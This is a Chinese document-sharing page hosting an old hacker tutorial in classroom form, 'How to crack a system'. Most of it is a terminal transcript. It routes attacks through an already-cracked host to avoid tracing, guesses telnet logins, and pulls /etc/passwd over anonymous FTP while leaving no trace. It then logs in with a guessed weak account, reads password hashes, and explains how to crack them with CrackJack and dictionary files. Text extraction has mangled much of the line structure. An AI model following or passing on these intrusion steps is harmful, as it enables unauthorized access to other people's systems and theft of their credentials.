如何破解系统1Word格式.docx
- 文档编号:22533242
- 上传时间:2023-02-04
- 格式:DOCX
- 页数:14
- 大小:22.61KB
如何破解系统1Word格式.docx
《如何破解系统1Word格式.docx》由会员分享,可在线阅读,更多相关《如何破解系统1Word格式.docx(14页珍藏版)》请在冰豆网上搜索。
进入"
该主机,这些Port都是很好的进行方向.当然还有很多Port,但是DayTime的Port你能拿它作甚麽?
?
我不知道,你知道吗?
底下的示范并不是像写出来的那麽容易,只不过是要让你了解如何进入,当然其中还有很多问题,如打错指令......等等的毛病...没有出现在课堂上,但是我为了面子....一定要删掉这些不堪入目的东西嘛...
示范进入主机的方法:
(ByCoolFire)
(首先要先连上某一台你已经有帐号的Telnet主机,当然最好是假的,也就是Crack过的主机,然後利用它来Crack别的主机,才不会被别人以逆流法查出你的所在)
DigitalUNIX()(ttypa)
login:
FakeName
Password:
Lastlogin:
MonDec203:
24:
00from255.255.0.0
(我用的是...当然是假的罗,都已经经过修改了啦!
没有这一台主机啦!
别怕!
以下的主机名称都是假的名称,请同学们要记得!
)
DigitalUNIXV1.2C(Rev.248);
MonOct3121:
23:
02CST1996
DigitalUNIXV1.2CWorksystemSoftware(Rev.248)
DigitalUNIXChineseSupportV1.2C(rev.3)
(嗯...进来了!
开始攻击吧!
本次的目标是......)
>
telnet(Telnet试试看....)
Trying111.222.255.255...
Connectedto.
Escapecharacteris'
^]'
.
Loginincorrect
(没关系,再来!
coollogin:
hinet
(都没猜对,这边用的是猜的方法,今天运气好像不好)
telnet>
close
Connectionclosed.
(重来,换个Port试试看!
telnet111.222.255.25580
Connectedto111.222.255.255.
<
HTML>
HEAD>
TITLE>
Error<
/TITLE>
/HEAD>
BODY>
H1>
Error400<
/H1>
Invalidrequest"
"
(unknownmethod)
P>
HR>
ADDRESS>
AHREF="
http:
//www.w3.org"
CERN-HTTPD3.0A<
/A>
/ADDRESS>
/BODY>
/HTML>
Connectionclosedbyforeignhost.
(哇哩!
连密码都没得输入,真是.....再来!
要有恒心!
(换FTPPort试试)
ftp111.222.255.255
220coolFTPserver(Versionwu-2.4
(1)TueAug815:
50:
43CDT1995)ready.
Name(111.222.255.255:
FakeName):
anonymous
331Guestloginok,sendyourcompletee-mailaddressaspassword.
230-Welcome,archiveuser!
ThisisanexperimentalFTPserver.Ifhaveany
230-unusualproblems,pleasereportthemviae-mailtoroot@
230-Ifyoudohaveproblems,pleasetryusingadash(-)asthefirstcharacter
230-ofyourpassword--thiswillturnoffthecontinuationmessagesthatmay
230-beconfusingyourftpclient.
230-
230Guestloginok,accessrestrictionsapply.
RemotesystemtypeisUNIX.
Usingbinarymodetotransferfiles.
(哇!
可以用anonymous进来耶!
password部份输入aaa@就好了!
不要留下足迹喔!
ftp>
ls
200PORTcommandsuccessful.
150OpeningASCIImodedataconnectionforfilelist.
etc
pub
usr
bin
lib
incoming
welcome.msg
226Transfercomplete.
(嗯嗯...太好了!
进来了!
下一个目标是.....)
cdetc
250CWDcommandsuccessful.
getpasswd(抓回来!
150OpeningBINARYmodedataconnectionforpasswd(566bytes).
566bytesreceivedin0.56seconds(0.93Kbytes/s)
(喔...这麽容易吗?
!
catpasswd(看看!
root:
:
0:
/root:
/bin/bash
bin:
*:
1:
/bin:
daemon:
2:
/sbin:
adm:
3:
4:
/var/adm:
lp:
7:
/var/spool/lpd:
sync:
5:
/bin/sync
shutdown:
6:
/sbin/shutdown
halt:
/sbin/halt
mail:
8:
12:
/var/spool/mail:
news:
9:
13:
/var/spool/news:
uucp:
10:
14:
/var/spool/uucp:
operator:
11:
games:
100:
/usr/games:
man:
15:
/usr/man:
postmaster:
ftp:
404:
/home/ftp:
(哇哩...是Shadow的...真是出师不利....)
bye
221Goodbye.
(不信邪....还是老话,要有恒心....)
(FTP不行,再Telnet看看!
telnet
(又猜错!
fuckyou
MonDec209:
20:
07from205.11.122.12
Linux1.2.13.
Someprogramminglanguagesmanagetoabsorbchangebutwithstand
progress.
cool:
~$
(哇哈哈!
哪个笨root,用systemname作username连
password也是systemname....总算...没白玩...)
~$system
bash:
system:
commandnotfound
(嗯...这个user的权限好像不大....)
~$ls
~$pwd
/home/fuckyou
~$cd/
/$ls
Public/cdrom/lib/mnt/tmp/www/
READMEdev/linux*proc/usr/
bin/etc/local/root/var/
boot/home/lost+found/sbin/
/$cdetc
quit
(好想睡呀!
不玩了!
下节课再开始....)
exit
(走了!
下节课在见啦!
今天就上到这里!
老师要先下班了!
(有学生说:
骗人!
还没有破解呀!
胡说!
不是已经进来了吗?
看看这节课上的是甚麽?
---->
进入主机!
嗯.....)
How2.
上节课抓回来一个"
乱七八糟"
的/etc/passwd,你以为我的真那麽笨吗?
guest所抓回来的能是甚麽好东西?
所以这一节课继续上次的攻击行动.上节课我们已经"
猜"
到了一个不是guest的username及password.今天就以它来进入主机瞧瞧!
本次的目标是.....呵...)
telnet(Telnet试试看....昨天的位址,
有作笔记吧!
.tw>
(一样输入fuckyou)
MonDec112:
44:
10from
~$cd/etc
/etc$ls
DIR_COLORSftpuserslocaltimeresolv.conf
HOSTNAMEgatewaysmagicrpc
NETWORKINGgroupmail.rcsecuretty
NNTP_INEWS_DOMAINhost.confmotdsendmail.cf
X11@hostsmessages/sendmail.st
XF86Confighosts.allowmtabservices
at.denyhosts.denymtoolsshells
bootptabhosts.equivnamed.bootshutdownp
csh.cshrchosts.lpdnetworkssnoopy/
csh.loginhttpd.confnntpserverslip.hosts
exportsinetd.confpasswdsnooptab
fastbootinittabpasswd.OLDsyslog.conf
fdprmissuepasswd.oldsyslog.pid
fstabld.so.cacheprintcapttys
ftpaccessld.so.confprofileutmp@
(找寻目标.....太乱了!
懒得找,再来....)
/etc$lspa*
passwdpasswd.OLDpasswd.old
(果然在)
/etc$morepasswd
(看看有没有Shadow...)
acqQkJ2LoYp:
john:
234ab56:
9999:
JohnSmith:
/home/john:
/bin/john
(正点!
一点都没有防备!
/etc$exit
logout
(走了!
....换FTP上场!
ftp
Name(:
66126):
331Passwordrequiredforfuckyou.
230Userfuckyouloggedin.
cd/etc
getpasswd
150OpeningBINARYmodedataconnectionforpasswd(350bytes).
350bytesreceivedin0.68seconds(1.9Kbytes/s)
catpasswd
(看看!
呵!
假不了!
......)
(闪人罗!
下课!
....喔慢点,还有事要说明......)
passwd的Shadow就是把passwd放在shadow档中,而你原先在第一节课所看到的这个格式的passwd并不是真正的passwd....
因为密码的部份没有东西....所以拿了也没有用!
但这一节课所拿到的东西呢,像是这样,有几点需要说明的,就是它究竟代表著甚麽?
/bin/sh
它以"
分成几个栏位,各栏位对照如下:
UserName:
john
234ab56
UserNo:
9999
GroupNo:
13
RealName:
JohnSmith
HomeDir:
/home/john
Shell:
/bin/sh
了了吧!
了了吧!
保留著你千辛万苦所拿到的passwd,咱们第三节课再来告诉各位如何使用CrackJack把passwd解码....呵呵...
zzZZzZzz...
CrackJackV1.4中文使用说明(ByCoolFire12-1-1996)
嗯...该到第三课了!
累了的同学先去喝口水吧!
这一节课咱们来说说CrackJack!
这可是个解读/etc/passwd的好工具喔,不要告诉我你习惯用Brute,拿Brute跟CrackJack的速度比比看,包准你马上投向CrackJack1.4的怀抱,但请先确定你所使用的是CrackJack1.4,你可以在CoolFire的Hacker&
MailerPage
中拿到这个版本的CrackJack!
这才是真正有用的版本,速度...对...就是这点别人都比不上!
但还是要讲讲它的缺点...就是只能在DOS跟OS2中跑,如果在Windoz95上开个DOSMode跑,它可是连理都不会理你的!
OK!
现在切入正题!
etc/passwd拿到手了吧!
开始罗!
使用CrackJack1.4前所需要的东西有这些[1]CrackJack1.4(废话...$%^&
@@)[2]/etc/passwd档案,你可以在Unix
系统中的/etc/目录中找到passwd[3]字典档(哪里找,自己敲...呵ClayMore中有一份
DIC.TXT是有一千多个字的字典,但比起我的字典可就小巫见大巫了,LetMeIn!
1.0里面也有,听James说2.0Release的时候会有更棒的字典档含入,期待吧!
)....使用CrackJack1.4
前需先确定你所使用的机器是386含以上CPU的!
然後最好有充足的记忆体!
开始Jack时只要敲入JACK即可,它会问你PWName...输入你的passwd档名,Dictionary
Name输入你的字典档名,Jack就会开始找了!
找到时会告诉你,也会在JACK.POT中写入它所找到的密码!
但...有点怪的格式!
如果找到的是具root权限的密码,Jack会告诉你
ThisisJackAss...嗯...说脏话了!
因为使用Jack占用的时间实在太多,如果你中途想要停掉时只要按下Ctrl-C即可,别以为你前功尽弃了!
因为Jack有个Restore的功能,中断时会自动存档为RESTORE,下次要继续这次的寻找只要输入Jack-Restore:
RESTORE即可!
当然你也可以为你的Restore重新命名!
Jack也会找得到的...如Renrestorerestore.HNT
之後要再寻找的时後就Jack-Restore:
RESTORE.HNT即可...Jack会很自动的Restore
前次所寻找的字串...继续帮你找下去....
字典档哪里找:
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 如何 破解 系统